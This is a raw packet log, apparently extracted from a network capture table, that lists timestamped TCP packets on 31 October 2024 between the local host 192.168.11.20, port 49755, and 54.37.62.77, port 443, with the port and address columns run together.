                                                                                                                                                                                                  Oct 31, 2024 18:05:24.718051910 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.718061924 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.718144894 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.718144894 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.718239069 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.719479084 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.719486952 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.719692945 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.719692945 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.719702005 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.719707966 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.719758987 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.719856977 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.721402884 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.721410990 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.721586943 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.721586943 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.721595049 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.721640110 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.721716881 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.721782923 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.722691059 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.722701073 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.722912073 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.722965002 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.722965002 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.722974062 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.723145962 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.723495960 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.723505974 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.723678112 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.723678112 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.723741055 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.723741055 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.723747015 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.723797083 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.723902941 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.763698101 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.763756037 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.763904095 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.763905048 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.763971090 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.764003038 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.764086008 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.764211893 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.770272970 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.770329952 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.770487070 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.770487070 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.770550966 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.770581961 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.770771980 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.942497015 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.942560911 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.942701101 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.942701101 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.942720890 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.942764044 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.942802906 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.942804098 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.942843914 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.942996025 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.943068027 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.943109035 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.943145037 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.943145037 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.943192959 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.943195105 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.943239927 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.943276882 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.943294048 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.943294048 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.943345070 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.943345070 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.943384886 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.943408966 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.943495989 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.943522930 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.943561077 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.943682909 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.943682909 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.943728924 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.943772078 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.943834066 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.943834066 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.943877935 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.943900108 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.943938017 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.943938017 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.943985939 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.944032907 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.944032907 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.944032907 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.944097042 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.944097042 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.944168091 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.944197893 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.944236994 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.944345951 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.944485903 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.944489002 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.944645882 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.944645882 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.944663048 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.944700956 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.944741964 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.944773912 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.944848061 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.944864988 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.944915056 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.944915056 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.944969893 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.945015907 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.945044994 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.945094109 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.945149899 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.945149899 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.945199966 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.945199966 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.945199966 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.945240974 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.945265055 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.945280075 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.945417881 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.945554018 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.945600033 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.945622921 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.945636988 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.945676088 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.945713043 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.945771933 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.945772886 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.945822954 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.945868969 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.945898056 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.945928097 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.945929050 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.945962906 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.945993900 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946026087 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946026087 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946026087 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946137905 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946181059 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946204901 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946333885 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946365118 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946398973 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946436882 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946436882 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946436882 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946436882 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946481943 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946506023 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946547985 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946590900 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946590900 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946590900 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946641922 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946722031 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946739912 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946739912 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946787119 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946827888 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946876049 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946876049 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946935892 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946964979 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946979046 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.946980000 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947139025 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947139978 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947165966 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947185040 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947185993 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947199106 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947284937 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947331905 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947331905 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947396040 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947428942 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947429895 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947475910 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947519064 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947566032 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947594881 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947594881 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947629929 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947663069 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947679043 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947707891 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947746992 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947788954 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947833061 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947833061 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947881937 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947881937 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947896957 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947931051 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.947966099 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948049068 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948049068 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948092937 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948142052 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948174953 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948234081 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948270082 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948270082 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948314905 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948314905 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948374033 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948374033 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948412895 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948451042 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948479891 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948525906 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948525906 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948570013 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948648930 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948648930 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948676109 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948719978 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948719978 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948766947 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948767900 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948806047 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948827982 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948827982 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948842049 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948880911 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948918104 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.948931932 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.949029922 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.949029922 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.949071884 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.949096918 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.949098110 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.949127913 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.949162960 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.949170113 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.949274063 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.949274063 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.949320078 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.949347019 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.949347019 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.949376106 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.949394941 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.949410915 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.949449062 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.949517012 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.949552059 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.949595928 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.949595928 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.949609995 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.949681044 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.949692965 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.949731112 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.949764013 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.949764967 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.949812889 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.949861050 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.949882984 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.949908018 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.949908018 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.949953079 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.949974060 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.950066090 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.950066090 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.950109959 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.950149059 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.950202942 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.950203896 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.950238943 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.950314045 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.950314045 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.950355053 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.950391054 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.950409889 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.950409889 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.950454950 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.950505972 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.950547934 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.950611115 CET49755443192.168.11.2054.37.62.77
